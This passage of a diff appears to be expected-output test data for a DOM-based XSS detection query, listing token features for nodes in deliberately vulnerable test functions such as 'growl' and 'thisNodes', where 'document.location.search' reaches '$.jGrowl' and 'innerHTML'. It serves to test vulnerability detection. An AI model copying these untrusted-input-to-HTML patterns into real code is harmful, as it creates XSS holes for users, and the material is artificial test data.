element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:347:1:350:1 | exceptional return of function growl | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:347:1:350:1 | exceptional return of function growl | enclosingFunctionBody | target document location search $ jGrowl target | +| autogenerated/Xss/DomBasedXss/tst.js:347:1:350:1 | exceptional return of function growl | enclosingFunctionName | growl | +| autogenerated/Xss/DomBasedXss/tst.js:347:1:350:1 | exceptional return of function growl | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:347:1:350:1 | functio ... OT OK\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:347:1:350:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:347:1:350:1 | functio ... OT OK\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:347:1:350:1 | return of function growl | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:347:1:350:1 | return of function growl | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:347:1:350:1 | return of function growl | enclosingFunctionBody | target document location search $ jGrowl target | +| autogenerated/Xss/DomBasedXss/tst.js:347:1:350:1 | return of function growl | enclosingFunctionName | growl | +| autogenerated/Xss/DomBasedXss/tst.js:347:1:350:1 | return of function growl | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:347:10:347:14 | growl | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:347:10:347:14 | growl | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:347:10:347:14 | growl | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:348:7:348:12 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:348:7:348:12 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:348:7:348:12 | target | enclosingFunctionBody | target document location search $ jGrowl target | +| autogenerated/Xss/DomBasedXss/tst.js:348:7:348:12 | target | enclosingFunctionName | growl | +| autogenerated/Xss/DomBasedXss/tst.js:348:7:348:12 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:348:7:348:39 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:348:7:348:39 | target | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:348:7:348:39 | target | enclosingFunctionBody | target document location search $ jGrowl target | +| autogenerated/Xss/DomBasedXss/tst.js:348:7:348:39 | target | enclosingFunctionName | growl | +| autogenerated/Xss/DomBasedXss/tst.js:348:7:348:39 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:348:7:348:39 | target ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:348:7:348:39 | target ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:348:7:348:39 | target ... .search | enclosingFunctionBody | target document location search $ jGrowl target | +| autogenerated/Xss/DomBasedXss/tst.js:348:7:348:39 | target ... .search | enclosingFunctionName | growl | +| autogenerated/Xss/DomBasedXss/tst.js:348:7:348:39 | target ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:348:16:348:23 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:348:16:348:23 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:348:16:348:23 | document | enclosingFunctionBody | target document location search $ jGrowl target | +| autogenerated/Xss/DomBasedXss/tst.js:348:16:348:23 | document | enclosingFunctionName | growl | +| autogenerated/Xss/DomBasedXss/tst.js:348:16:348:23 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:348:16:348:32 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:348:16:348:32 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:348:16:348:32 | document.location | enclosingFunctionBody | target document location search $ jGrowl target | +| autogenerated/Xss/DomBasedXss/tst.js:348:16:348:32 | document.location | enclosingFunctionName | growl | +| autogenerated/Xss/DomBasedXss/tst.js:348:16:348:32 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:348:16:348:39 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:348:16:348:39 | documen ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:348:16:348:39 | documen ... .search | enclosingFunctionBody | target document location search $ jGrowl target | +| autogenerated/Xss/DomBasedXss/tst.js:348:16:348:39 | documen ... .search | enclosingFunctionName | growl | +| autogenerated/Xss/DomBasedXss/tst.js:348:16:348:39 | documen ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:348:25:348:32 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:348:25:348:32 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:348:25:348:32 | location | enclosingFunctionBody | target document location search $ jGrowl target | +| autogenerated/Xss/DomBasedXss/tst.js:348:25:348:32 | location | enclosingFunctionName | growl | +| autogenerated/Xss/DomBasedXss/tst.js:348:25:348:32 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:348:34:348:39 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:348:34:348:39 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:348:34:348:39 | search | enclosingFunctionBody | target document location search $ jGrowl target | +| autogenerated/Xss/DomBasedXss/tst.js:348:34:348:39 | search | enclosingFunctionName | growl | +| autogenerated/Xss/DomBasedXss/tst.js:348:34:348:39 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:349:3:349:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:349:3:349:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:349:3:349:3 | $ | enclosingFunctionBody | target document location search $ jGrowl target | +| autogenerated/Xss/DomBasedXss/tst.js:349:3:349:3 | $ | enclosingFunctionName | growl | +| autogenerated/Xss/DomBasedXss/tst.js:349:3:349:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:349:3:349:10 | $.jGrowl | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:349:3:349:10 | $.jGrowl | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:349:3:349:10 | $.jGrowl | enclosingFunctionBody | target document location search $ jGrowl target | +| autogenerated/Xss/DomBasedXss/tst.js:349:3:349:10 | $.jGrowl | enclosingFunctionName | growl | +| autogenerated/Xss/DomBasedXss/tst.js:349:3:349:10 | $.jGrowl | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:349:3:349:18 | $.jGrowl(target) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:349:3:349:18 | $.jGrowl(target) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:349:3:349:18 | $.jGrowl(target) | enclosingFunctionBody | target document location search $ jGrowl target | +| autogenerated/Xss/DomBasedXss/tst.js:349:3:349:18 | $.jGrowl(target) | enclosingFunctionName | growl | +| autogenerated/Xss/DomBasedXss/tst.js:349:3:349:18 | $.jGrowl(target) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:349:3:349:18 | exceptional return of $.jGrowl(target) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:349:3:349:18 | exceptional return of $.jGrowl(target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:349:3:349:18 | exceptional return of $.jGrowl(target) | enclosingFunctionBody | target document location search $ jGrowl target | +| autogenerated/Xss/DomBasedXss/tst.js:349:3:349:18 | exceptional return of $.jGrowl(target) | enclosingFunctionName | growl | +| autogenerated/Xss/DomBasedXss/tst.js:349:3:349:18 | exceptional return of $.jGrowl(target) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:349:5:349:10 | jGrowl | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:349:5:349:10 | jGrowl | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:349:5:349:10 | jGrowl | enclosingFunctionBody | target document location search $ jGrowl target | +| autogenerated/Xss/DomBasedXss/tst.js:349:5:349:10 | jGrowl | enclosingFunctionName | growl | +| autogenerated/Xss/DomBasedXss/tst.js:349:5:349:10 | jGrowl | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:349:12:349:17 | target | CalleeFlexibleAccessPath | $.jGrowl | | autogenerated/Xss/DomBasedXss/tst.js:349:12:349:17 | target | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:349:12:349:17 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17306,6 +120279,165 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:349:12:349:17 | target | enclosingFunctionName | growl | | autogenerated/Xss/DomBasedXss/tst.js:349:12:349:17 | target | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:349:12:349:17 | target | receiverName | $ | +| autogenerated/Xss/DomBasedXss/tst.js:352:1:352:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:352:1:352:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:352:1:352:0 | this | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:352:1:352:0 | this | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:352:1:352:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:352:1:368:1 | 'arguments' object of function thisNodes | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:352:1:368:1 | 'arguments' object of function thisNodes | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:352:1:368:1 | 'arguments' object of function thisNodes | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:352:1:368:1 | 'arguments' object of function thisNodes | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:352:1:368:1 | 'arguments' object of function thisNodes | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:352:1:368:1 | exceptional return of function thisNodes | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:352:1:368:1 | exceptional return of function thisNodes | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:352:1:368:1 | exceptional return of function thisNodes | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:352:1:368:1 | exceptional return of function thisNodes | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:352:1:368:1 | exceptional return of function thisNodes | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:352:1:368:1 | functio ... in; \\n\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:352:1:368:1 | functio ... in; \\n\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:352:1:368:1 | functio ... in; \\n\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:352:1:368:1 | return of function thisNodes | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:352:1:368:1 | return of function thisNodes | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:352:1:368:1 | return of function thisNodes | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:352:1:368:1 | return of function thisNodes | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:352:1:368:1 | return of function thisNodes | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:352:10:352:18 | thisNodes | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:352:10:352:18 | thisNodes | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:352:10:352:18 | thisNodes | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:353:6:353:15 | pluginName | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, 